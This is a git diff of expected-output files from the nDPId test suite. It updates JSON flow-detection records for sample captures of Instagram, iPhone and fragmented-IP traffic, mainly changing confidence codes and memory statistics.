-00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2230,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265146,"flow_last_seen":1568796265175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265175,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2231,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265147,"flow_last_seen":1568796265176,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265176,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
-00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1366,"flow_first_seen":1568796253770,"flow_last_seen":1568796268061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1220206,"flow_avg_l4_payload_len":893,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1568796254514,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":97782,"flow_avg_l4_payload_len":679,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":388,"flow_first_seen":1568796254515,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":283610,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1568796254524,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155234,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":359,"flow_first_seen":1568796265146,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":272019,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":212,"flow_first_seen":1568796265147,"flow_last_seen":1568796268053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155200,"flow_avg_l4_payload_len":732,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} -00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":3443,"packets-processed":3442,"total-skipped-flows":0,"total-l4-payload-len":2699527,"total-not-detected-flows":1,"total-guessed-flows":7,"total-detected-flows":33,"total-detection-updates":22,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":242,"global_ts_msec":1568796268061} 
+00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2222,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265146,"flow_last_seen":1568796265162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2224,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265147,"flow_last_seen":1568796265162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2230,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265146,"flow_last_seen":1568796265175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265175,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2231,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265147,"flow_last_seen":1568796265176,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796265176,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 
+00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1366,"flow_first_seen":1568796253770,"flow_last_seen":1568796268061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1220206,"flow_avg_l4_payload_len":893,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1568796254514,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":97782,"flow_avg_l4_payload_len":679,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
+00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":388,"flow_first_seen":1568796254515,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":283610,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1568796254524,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155234,"flow_avg_l4_payload_len":674,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} 
+00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":359,"flow_first_seen":1568796265146,"flow_last_seen":1568796268054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":272019,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":212,"flow_first_seen":1568796265147,"flow_last_seen":1568796268053,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155200,"flow_avg_l4_payload_len":732,"midstream":0,"thread_ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":3443,"packets-processed":3442,"total-skipped-flows":0,"total-l4-payload-len":2699527,"total-not-detected-flows":1,"total-guessed-flows":7,"total-detected-flows":33,"total-detection-updates":21,"total-updates":0,"current-active-flows":0,"total-active-flows":38,"total-idle-flows":38,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":241,"global_ts_msec":1568796268061} 
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3443/3442 ~~ skipped flows.............: 0 @@ -248,9 +247,9 @@ ~~ total active/idle flows...: 38/38 ~~ total timeout flows.......: 5 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6570679 bytes -~~ total memory freed........: 6570679 bytes -~~ total allocations/frees...: 121841/121841 +~~ total memory allocated....: 6238351 bytes +~~ total memory freed........: 6238351 bytes +~~ total allocations/frees...: 124558/124558 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2417 chars diff --git a/test/results/ip_fragmented_garbage.pcap.out b/test/results/ip_fragmented_garbage.pcap.out index cf0fd76ec..eb2197d52 100644 --- a/test/results/ip_fragmented_garbage.pcap.out +++ b/test/results/ip_fragmented_garbage.pcap.out @@ -18221,9 +18221,9 @@ ~~ total active/idle flows...: 29/29 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5899152 bytes -~~ total memory freed........: 5899152 bytes -~~ total allocations/frees...: 118226/118226 +~~ total memory allocated....: 6032786 bytes +~~ total memory freed........: 6032786 bytes +~~ total allocations/frees...: 120988/120988 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 222 chars ~~ json string max len.......: 609 chars diff --git a/test/results/iphone.pcap.out b/test/results/iphone.pcap.out index 017bacf23..192dab4b1 100644 --- a/test/results/iphone.pcap.out +++ b/test/results/iphone.pcap.out 
@@ -2,22 +2,22 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"iphone.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1582454552576} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454552576,"flow_last_seen":1582454552576,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454552576,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01122{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1582454552576,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"thread_ts_msec":1582454552576,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIaAFkAAEAR8inAqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454552576,"flow_last_seen":1582454552576,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454552576,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454552576,"flow_last_seen":1582454552576,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454552576,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553219,"flow_last_seen":1582454553219,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454553219,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1582454553219,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454553219,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeCUAAP8RQoAAAAAA\/\/\/\/\/wBEAEMBNI0tAQEGAHhURwkAGwAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} -00730{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553219,"flow_last_seen":1582454553219,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454553219,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 
+00730{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553219,"flow_last_seen":1582454553219,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454553219,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553606,"flow_last_seen":1582454553606,"flow_idle_time":200000,"flow_min_l4_payload_len":1157,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1157,"flow_avg_l4_payload_len":1157,"midstream":0,"thread_ts_msec":1582454553606,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01985{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1582454553606,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1199,"pkt_l4_len":1165,"thread_ts_msec":1582454553606,"pkt":"AQBeAAD7xiwDYGpkCABFAASh9MAAAP8RHubAqAIB4AAA+xTpFOkEjReaAACEAAAAAB4AAAALDUx1Y2HigJlzIGlNYWMGX29kaXNrBF90Y3AFbG9jYWwAABCAAQAAEZQANDNzeXM9d2FNQT1DNDoyQzowMzowNjo0OTpGRSxhZFZGPTB4NCxhZERUPTB4MyxhZENDPTAJX3NlcnZpY2VzB19kbnMtc2QEX3VkcMAmAAwAAQAAEZQAAsAawBoADAABAAARlAACwAwNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AIQAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xNwlfa2VyYmVyb3MKTHVjYXMtaU1hY8AmABAAAQAAEZQAMzJMS0RDOlNIQTEuNDkyNDgwQzNFQTgyODI3NzFBMEQyODhGMTExRUY5RTc1MUY5NUE2Mw1MdWNh4oCZcyBpTWFjBF9zbWLAIQAQgAEAABGUAAEAwGsADAABAAARlAACwUHBQQAMAAEAABGUAALBMw1MdWNh4oCZcyBpTWFjC19hZnBvdmVydGNwwCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsF9wX0ADAABAAARlAACwW8NTHVjYeKAmXMgaU1hYwRfc3NowCEAEIABAAARlAABAMBrAAwAAQAAEZQAAsHAwcAADAABAAARlAACwbINTHVjYeKAmXMgaU1hYwlfc2Z0cC1zc2jAIQAQgAEAABGUAAEAwGsADAABAAARlAACwfzB\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\/oAAAAAAAADELAP\/\/mBqZMAMAC+AAQAAEZQACcAMAAUAAIAAQMEzAC+AAQAAEZQACcEzAAUAAIAAQMFvAC+AAQAAEZQACcFvAAUAAIAAQMGyAC+AAQAAEZQACcGyAAUAAIAAQMHuAC+AAQAAEZQACcHuAAUAAIAAQMKTAC+AAQAAEZQACcKTAAUAAIAAQMLjAC+AAQAAEZQACcLjAAUAAIAAQMDpAC+AAQAAAHgACMDpAARAAAAIAAApBaAAABGUABIABAAOAADELAMGSf7GLANgamQ="} 
